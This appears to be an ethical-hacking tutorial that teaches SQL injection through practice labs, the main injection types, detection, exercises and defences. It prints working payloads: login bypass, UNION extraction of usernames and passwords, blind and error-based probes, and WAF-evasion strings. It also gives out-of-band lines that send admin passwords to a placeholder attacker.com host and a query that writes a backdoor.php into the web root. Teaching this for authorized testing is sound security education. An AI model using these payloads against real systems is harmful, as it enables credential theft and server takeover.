Complete Guide to Learning SQL Injection (SQLi) - Ethical Hacking Tutorial

SQL Injection (SQLi) remains one of the most critical web application vulnerabilities, consistently ranking in the OWASP Top 10. This comprehensive guide will teach you how to learn SQL Injection ethically, set up practice labs, and master detection and exploitation techniques for penetration testing and security research.

Prerequisites for Learning SQL Injection

Before diving into SQLi, you should have:

• Basic understanding of how websites work (client-server architecture)
• Fundamental knowledge of SQL (Structured Query Language)
• Familiarity with web technologies (HTML, PHP, JavaScript)
• Basic command line skills

Step 1: Learn SQL Fundamentals

SQL Injection manipulates database queries, so you must understand SQL first:

Key SQL Concepts to Master:

• SELECT, INSERT, UPDATE, DELETE statements
• UNION operator for combining queries
• WHERE clauses and conditional operators
• JOIN operations between tables
• Database schemas and information_schema
• Comments in SQL (-- , /* */)

Step 2: Set Up Your SQLi Learning Environment

Best Vulnerable Apps for SQLi Practice:

• DVWA (Damn Vulnerable Web App): Beginner-friendly with security levels
• OWASP Juice Shop: Modern vulnerable web app
• WebGoat: OWASP's deliberately insecure app
• SQLi Labs: Dedicated SQL injection practice
• Mutillidae II: Another excellent vulnerable web app

Step 3: Understand SQL Injection Types

SQL Injection comes in several forms. Learn to recognize each type:

1. Classic SQL Injection

Manipulating input parameters to alter SQL queries:

SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1'

2. Union-Based SQLi

Using UNION to extract data from other tables:

SELECT name, description FROM products WHERE id=1 UNION SELECT username, password FROM users--

3. Error-Based SQLi

Forcing database errors to reveal information:

SELECT * FROM users WHERE id=1 AND GTID_SUBSET(@@version,0)--

4. Blind SQLi (Boolean and Time-Based)

Inferring data through true/false responses or delays:

SELECT * FROM users WHERE id=1 AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'

SELECT * FROM users WHERE id=1; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a' WAITFOR DELAY '0:0:5'--

5. Out-of-Band SQLi

Using DNS or HTTP requests to exfiltrate data:

SELECT * FROM users WHERE id=1; EXEC master..xp_dirtree '\\attacker.com\'+ (SELECT password FROM users WHERE username='admin') +'.txt'--

Step 4: SQL Injection Detection Techniques

Manual Detection Methods:

1. Single Quote Test: Add a single quote (') to input fields
2. Boolean Tests: Try 1=1 (true) and 1=2 (false) conditions
3. Time-Based Tests: Use sleep commands to detect blind SQLi
4. Error Provocation: Attempt to trigger SQL errors

Automated Tools for SQLi Detection:

• SQLmap: The most powerful automated SQL injection tool
• Burp Suite: Professional web security testing tool
• OWASP ZAP: Open source web app security scanner
• Havij: User-friendly SQL injection tool (Windows)

Step 5: Hands-on SQL Injection Practice

Practical SQLi Exercises:

Exercise 1: Bypass Authentication

1. Find a login page in your vulnerable app
2. Try classic SQLi payload: ' OR '1'='1
3. Try variations: admin'--, admin'#

Exercise 2: Extract Database Information

1. Find a vulnerable parameter (product ID, username, etc.)
2. Determine the number of columns using ORDER BY
3. Use UNION to extract database version, tables, and data

Step 6: Advanced SQL Injection Techniques

1. Second-Order SQL Injection

Where input is stored and executed later:

INSERT INTO comments (text) VALUES ('admin'-- ');

2. Bypassing WAFs (Web Application Firewalls)

Techniques to evade security filters:

SEL/*bypass*/ECT * FROM users WHERE id=1

UNI%0bON SELECT 1,2,3

3. Out-of-Band Data Exfiltration

Using DNS or HTTP requests to extract data:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share\\'))

4. File System Operations

Reading and writing files when conditions allow:

SELECT * FROM users INTO OUTFILE '/var/www/html/backdoor.php'

Step 7: Learn SQL Injection Prevention

To be a complete security professional, you must understand defenses:

SQLi Mitigation Techniques:

• Prepared Statements (Parameterized Queries): The most effective defense
• Stored Procedures: When implemented securely
• Input Validation: Whitelisting and proper sanitization
• Least Privilege: Database accounts with minimal permissions
• Web Application Firewalls: As a secondary defense

Recommended Learning Path

1. Week 1: Learn SQL fundamentals and set up lab environment
2. Week 2: Practice classic SQLi on DVWA and WebGoat
3. Week 3: Master union-based and error-based SQLi
4. Week 4: Learn blind SQLi techniques
5. Week 5: Explore advanced topics and WAF bypass
6. Week 6: Practice on CTF challenges and real-world scenarios

Certifications for SQL Injection Knowledge

Validate your skills with these certifications:

• OSCP (Offensive Security Certified Professional): Includes web app testing
• CEH (Certified Ethical Hacker): Covers SQLi fundamentals
• eWPT (eLearnSecurity Web Penetration Tester): Focused on web apps
• Burp Suite Certified Practitioner: Web security practical exam

Conclusion

Mastering SQL Injection requires patience and practice. Start with basic techniques in controlled environments before progressing to more advanced methods. Remember that ethical hacking is about improving security - always get proper authorization before testing systems you don't own.

By following this structured learning path, practicing regularly, and staying updated with new techniques and defenses, you'll develop valuable skills in web application security that are highly sought after in the cybersecurity industry.